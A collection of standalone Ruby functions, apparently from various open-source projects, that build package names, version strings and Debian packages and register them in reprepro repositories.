"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n Packager::Makeself.new(self).package_name\n when 'msi'\n Packager::MSI.new(self).package_name\n when 'bff'\n Packager::BFF.new(self).package_name\n when 'solaris'\n Packager::Solaris.new(self).package_name\n when 'pkg'\n Packager::PKG.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::PKG.new(self)\n Packager::MacDmg.new(pkg).package_name\n when 'rpm'\n Packager::RPM.new(self).package_name\n when 'deb'\n Packager::DEB.new(self).package_name\n else\n raise RuntimeError, \"I do not know how to build a `#{pkg_type}'!\"\n end\n end",
"def generateBuildNamePrefix()\n testflight_version_number = get_version_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n testflight_build_number = get_build_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n return \"CICD_\" + testflight_version_number.to_s + \"-\" + testflight_build_number.to_s\nend",
"def build_name(name)\n \"_design/#{name}\"\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def build_name\n \"#{manufacturer} #{weight} #{style} #{name}\"\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n 
########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def get_java_ospkg_name (platform, version, type)\n pfx = \"#{platform.downcase == 'rhel' ? \"java-1.#{version}.0-\" :''}\"\n case platform.downcase\n when 'rhel'\n sfx = (type.downcase == 'jre' ? '' :'-devel')\n else\n sfx = \"-#{version}-\".concat(type.downcase == 'jre' ? 'jre' :'jdk')\n end\n \"#{pfx}openjdk#{sfx}\"\n end",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def generateDebugIpaName()\n prefix = generateBuildNamePrefix_Debug\n return prefix + \".ipa\"\nend",
"def project_name(new_name = T.unsafe(nil)); end",
"def design_name\n\n if 1 == 2 # self.part_number_id == 0\n design_name = self.prefix.pcb_mnemonic + self.number\n design_name += self.revision.name if self.revision && self.revision_id > 0\n \n case self.entry_type\n when 'dot_rev'\n design_name += self.numeric_revision.to_s if self.numeric_revision > 0\n when 'date_code'\n design_name += self.numeric_revision.to_s if self.numeric_revision && self.numeric_revision > 0\n design_name += '_eco'\n design_name += self.eco_number\n end\n \n \"#{design_name} (\" + \n self.prefix.pcb_number(self.number,\n self.revision.name,\n self.numeric_revision) + ')'\n else\n self.pcb_number\n end\n \n end",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def name\n return \"New Firmware\" if !id\n version + \" (\" + description.to_s + \") \" +\n \" (\" + (for_external ? \"internal\" : \"external\") + \")\"\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def release(options)\n options = options.rekey\n\n unixname = self.unixname\n\n package = options[:package] || metadata.name\n version = options[:version] || metadata.version\n\n date = options[:date] || metadata.released || Time::now.strftime('%Y-%m-%d %H:%M')\n\n changes = options[:changes] || project.history.releases[0].changes\n notes = options[:notes] || project.history.releases[0].note\n\n release = options[:release] || version\n\n files = options[:files] || options[:file] || []\n\n #store = options[:store] || 'pkg'\n\n processor = options[:processor] || 'Any'\n\n is_public = !options[:private]\n\n #raise ArgumentError, \"missing unixname\" unless unixname\n raise ArgumentError, \"missing package\" unless package\n raise ArgumentError, \"missing release\" unless release\n\n # package name has to be 3+ characters.\n if package.size < 3\n package = package + \"'s\"\n end\n\n # sub in for version if %s is used in release name.\n release = release % version if release.index(\"%s\")\n\n release_notes = notes\n release_changes = changes\n\n # Gather package files to release.\n if files.empty?\n files = find_packages(version)\n else\n files = files.map do |file|\n if File.directory?(file)\n find_packages(version, file)\n else\n file\n end\n end\n files = files.flatten\n end\n files = files.select{ |f| File.file?(f) }\n\n abort \"No package files.\" if files.empty?\n\n files.each do |file|\n abort \"Not a file -- #{file}\" unless File.exist?(file)\n puts \"Release file: #{File.basename(file)}\"\n end\n\n # which package types\n #rtypes = [ 'tgz', 'tbz', 'tar.gz', 'tar.bz2', 'deb', 'gem', 'ebuild', 'zip' ]\n #rtypes -= exclude\n #rtypes = rtypes.collect{ |rt| Regexp.escape( rt ) }\n #re_rtypes = Regexp.new('[.](' << rtypes.join('|') << ')$')\n\n puts \"Releasing #{package} #{release} to #{unixname} project...\" #unless options['quiet']\n\n login do\n\n raise ArgumentError, \"missing group_id\" unless group_id\n\n unless package_id = package?(package)\n if trial?\n puts \"Package '#{package}' does not exist.\"\n puts \"Create package #{package}.\"\n abort \"Cannot continue in trial mode.\"\n else\n #unless options['force']\n q = \"Package '#{package}' does not exist. Create?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #end\n puts \"Creating package #{package}...\"\n create_package(package, is_public)\n unless package_id = package?(package)\n raise \"Package creation failed.\"\n end\n end\n end\n if release_id = release?(release, package_id)\n #unless options[:force]\n if trial?\n puts \"Release #{release} already exists.\"\n else\n q = \"Release #{release} already exists. 
Re-release?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #puts \"Use -f option to force re-release.\"\n #return\n end\n files.each do |file|\n fname = File.basename(file)\n if file_id = file?(fname, package)\n if trial?\n puts \"Remove file #{fname}.\"\n else\n puts \"Removing file #{fname}...\"\n remove_file(file_id, release_id, package_id)\n end\n end\n if trial?\n puts \"Add file #{fname}.\"\n else\n puts \"Adding file #{fname}...\"\n add_file(file, release_id, package_id, processor)\n end\n end\n else\n if trial?\n puts \"Add release #{release}.\"\n else\n puts \"Adding release #{release}...\"\n add_release(release, package_id, files,\n :processor => processor,\n :release_date => date,\n :release_changes => release_changes,\n :release_notes => release_notes,\n :preformatted => '1'\n )\n unless release_id = release?(release, package_id)\n raise \"Release creation failed.\"\n end\n end\n #files.each do |file|\n # puts \"Added file #{File.basename(file)}.\"\n #end\n end\n end\n puts \"Release complete!\" unless trial?\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def split_name_package(fullname)\n fixing = fullname.gsub(/:/, \".\")\n split = fixing.match(/^(?:((?:\\w+\\.?)*)\\.)?(\\w+)$/) || []\n name = split[2] || \"\"\n package = split[1] || \"\"\n # downcase the first letter of each package name\n package = package.split(\".\").map {|s| s[0].downcase+s[1..-1]}.join(\".\")\n [name, package]\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def package_name\n raise NotImplementedError\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def build_host_name\n if @build_host_template_name.nil?\n validate_platform\n @build_host_template_name = @platform.vmpooler_template\n end\n\n @build_host_template_name\n end",
"def live_name\n [\n transformed_part('product'),\n middle_name(standalone: false), # Will have word dividers on either side\n idx,\n maybe_upto,\n '-',\n parts['sku'] =~ /editorial/ && bang? ? 'square-' : nil,\n [name_base, ext_name].join\n ].compact.join\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def getNameForPrecompiled\n sanitizeForPath(\"#{@Name}_#{@Version}_\" +\n (@BranchEpoch ? \"sv_#{@BranchEpoch}_\" : '') +\n \"opts_#{optionsHash}\")\n end",
"def make_name(template, clim, building_type, spc_type)\n clim = clim.gsub('ClimateZone ', 'CZ')\n if clim == 'CZ1-8'\n clim = ''\n end\n\n if building_type == 'FullServiceRestaurant'\n building_type = 'FullSrvRest'\n elsif building_type == 'Hospital'\n building_type = 'Hospital'\n elsif building_type == 'LargeHotel'\n building_type = 'LrgHotel'\n elsif building_type == 'LargeOffice'\n building_type = 'LrgOffice'\n elsif building_type == 'MediumOffice'\n building_type = 'MedOffice'\n elsif building_type == 'Mid-riseApartment'\n building_type = 'MidApt'\n elsif building_type == 'Office'\n building_type = 'Office'\n elsif building_type == 'Outpatient'\n building_type = 'Outpatient'\n elsif building_type == 'PrimarySchool'\n building_type = 'PriSchl'\n elsif building_type == 'QuickServiceRestaurant'\n building_type = 'QckSrvRest'\n elsif building_type == 'Retail'\n building_type = 'Retail'\n elsif building_type == 'SecondarySchool'\n building_type = 'SecSchl'\n elsif building_type == 'SmallHotel'\n building_type = 'SmHotel'\n elsif building_type == 'SmallOffice'\n building_type = 'SmOffice'\n elsif building_type == 'StripMall'\n building_type = 'StMall'\n elsif building_type == 'SuperMarket'\n building_type = 'SpMarket'\n elsif building_type == 'Warehouse'\n building_type = 'Warehouse'\n end\n\n parts = [template]\n\n unless building_type.empty?\n parts << building_type\n end\n\n unless spc_type.nil?\n parts << spc_type\n end\n\n unless clim.empty?\n parts << clim\n end\n\n result = parts.join(' - ')\n\n @created_names << result\n\n return result\n end",
"def is_deb?\n return !!@name.match(/^(debian|ubuntu|cumulus|huaweios)-.*$/)\n end",
"def detailed_name\n \"#{label} ( #{name}_V#{version} )\"\n end",
"def build_host_name\n if @platform.abs_resource_name\n @platform.abs_resource_name\n elsif @platform.vmpooler_template\n @platform.vmpooler_template\n else\n @platform.name\n end\n end",
"def build_host_name\n if @platform.abs_resource_name\n @platform.abs_resource_name\n elsif @platform.vmpooler_template\n @platform.vmpooler_template\n else\n @platform.name\n end\n end",
"def require_convert(k, v, prefix, klass)\n\n # package type/name maps\n map = { FPM::Package::RPM => :rpm, FPM::Package::Deb => :deb, FPM::Package::Phar => :phar }\n typ = map.include?(klass) ? map[klass] : :deb\n pn = {\n :php => { :phar => \"php\", :deb => \"php5-common\", :rpm => \"php(language)\" },\n :ext => { :phar => \"ext:\", :deb => \"php5-\", :rpm => \"php-\" },\n :lib => { :phar => \"sys:lib\", :deb => \"lib\", :rpm => \"lib\" },\n :bin => { :phar => \"bin:\", :deb => \"\", :rpm => \"/usr/bin/\" }\n }\n\n # package names, magic values\n case k = k.strip.gsub(/\\W+/, \"-\")\n when /^php(-32bit|-64bit)?|^hhvm|^quercus/\n k = pn[:php][typ]\n @architecture = ($1 == \"-32bit\") ? \"x86\" : \"amd64\" if $1\n when /^(ext|lib|bin)-(\\w+)$/\n k = pn[$1.to_sym][typ] + $2\n else\n k = prefix + k\n end\n\n # expand version specifiers (this is intentionally incomplete)\n if attributes[:no_depends_given?]\n v = \"\"\n else\n v = v.split(\",\").map {\n |v|\n case v = ver(v, typ)\n when \"*\"\n \"\"\n when /^[\\d.-]+~*$/ # 1.0.1\n \" = #{v}\"\n when /^((\\d+\\.)*(\\d+))\\.\\*/ # 1.0.*\n [\" >= #{$1}.0\", \" <= #{$1}.999\"]\n when /^([!><=]*)([\\d.-]+~*)$/ # >= 2.0 # debianize_op() normalizes >, <, = anyway\n \" #{$1} #{$2}\"\n when /^~\\s*([\\d.-]+~*)$/ # ~2.0 # deb.fix_dependency translates that into a range [\"pkg(>=1)\", \"pkg(<<2)\"]\n \" ~> #{$1}\"\n else\n \"\"\n end\n }\n end\n return k ? v.flatten.map { |v| k + v } : nil\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def create_package(logger:, release_model:, fix:, compiled_release:, package_meta:, release_dir:)\n name = package_meta['name']\n version = package_meta['version']\n\n package_attrs = {\n release: release_model,\n name: name,\n sha1: nil,\n blobstore_id: nil,\n fingerprint: package_meta['fingerprint'],\n version: version,\n }\n\n package = Models::Package.new(package_attrs)\n package.dependency_set = package_meta['dependencies']\n\n save_package_source_blob(logger, package, fix, package_meta, release_dir) unless compiled_release\n\n package.save\n end",
"def deregister_debian_package(pkg_name_expression, release_name, codename, exactmatch = false)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n logfile = File.join(log_dir,\"deregistration-reprepro-#{release_name}-#{codename}.log\")\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n\n if exactmatch\n cmd << \"remove\" << codename << pkg_name_expression\n else\n cmd << \"removematched\" << codename << pkg_name_expression\n end\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n Packager.info \"Remove existing package matching '#{pkg_name_expression}': #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n Packager.info \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n else\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n cmd << \"deleteunreferenced\"\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def set_version_name!\n if patterns = @name.match(/^(.*) \\[(.*)\\](.*)$/)\n @name = \"#{patterns[1]}#{patterns[3]}\"\n @version_name = patterns[2]\n end\n end",
"def generate_intended_filename_regex conf\n prefix = \"#{ conf['local_hostname'] }-\\\\d{4}_\\\\d{2}_\\\\d{2}\"\n case conf['type']\n when /dir/\n dir_part = conf['path'].sub(/\\//,'').gsub(/\\//,\"-\")\n return \"#{ prefix }-#{ dir_part }\\\\.tar\\\\.gz\"\n when /mys/\n db_part = conf['database']\n return \"#{ prefix }-#{ db_part }\\\\.sql\\\\.gz\"\n end\nend",
"def package(name)\n if name.respond_to? :cache_path\n name\n elsif @versions[name]\n Package.for(@sources[name], @versions[name], @files[name])\n end\n end",
"def generate_run_name(test_type)\n time = Time.new\n spot_name = \"0312_\" + time.year.to_s + time.month.to_s + \"00\" +\n time.day.to_s + \"_1_SP\" \n library_name = \"\" \n \n if test_type.eql?(\"mp\")\n library_name = \"ANG_TEST_1_1pA_0100\" + rand(999999).to_s + \"_1\"\n else\n library_name = \"ANG_TEST_1_1sA_0100\" + rand(999999).to_s + \"_1\" \n end\n return spot_name + \"_\" + library_name\nend",
"def formatted_filename(name, version, suffix, extension)\n name.gsub(\"#{version}_\", \"\").chomp(File.extname(name)) + \"_#{suffix}.#{extension}\"\n end",
"def generate_run_name\n return super if CodeRunner::GLOBAL_OPTIONS[:short_run_name]\n @run_name = %[v#@version] + @naming_pars.inject(\"\") do |str, par|\n case par\n when :flux_pars\n str+=\"_flx_#{send(par).map{|k,v| \"#{k}_#{v.to_s[0..8]}\"}.join(\"_\")}}\"\n else\n str+=\"_#{par}_#{send(par).to_s[0...8]}\"\n end\n end\n @run_name = @run_name.gsub(/\\s+/, \"_\").gsub(/[\\/{}\"><:=]/, '') + \"_id_#@id\"\n end",
"def package_meta(name, depend,\n version: \"0.1\",\n force_update: false,\n distribution: nil,\n architecture: nil)\n\n debian_pkg_name = debian_meta_name(name)\n\n if force_update\n dirname = packaging_dir(debian_pkg_name)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n distribution ||= target_platform.distribution_release_name\n architecture ||= target_platform.architecture\n packaging_dir = packaging_dir(debian_pkg_name)\n\n if not File.directory?(packaging_dir)\n FileUtils.mkdir_p packaging_dir\n end\n\n package_deb_meta(name, depend,\n version: version,\n distribution: distribution,\n packaging_dir: packaging_dir)\n end",
"def release_name\n FFI::GDAL.GDALVersionInfo('RELEASE_NAME')\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def product_name\n name? ? name : [product.name, sub_name].reject{ |a| a.strip.length == 0 }.join(' - ')\n end",
"def ver(v, typ)\n v.gsub!(/ (?:^.+ \\sAS\\s (.+$))? | \\s+() | ^v() /nix, \"\\\\1\")\n case typ\n when :deb\n v.gsub!(/[-@](dev|patch).*$/, \"~~\")\n v.gsub!(/[-@](alpha|beta|RC|stable).*$/, \"~\")\n when :rpm\n v.gsub!(/[-@](dev|patch|alpha|beta|RC|stable).*$/, \"\")\n else\n v.gsub!(/@/, \"-\")\n end\n return v\n end",
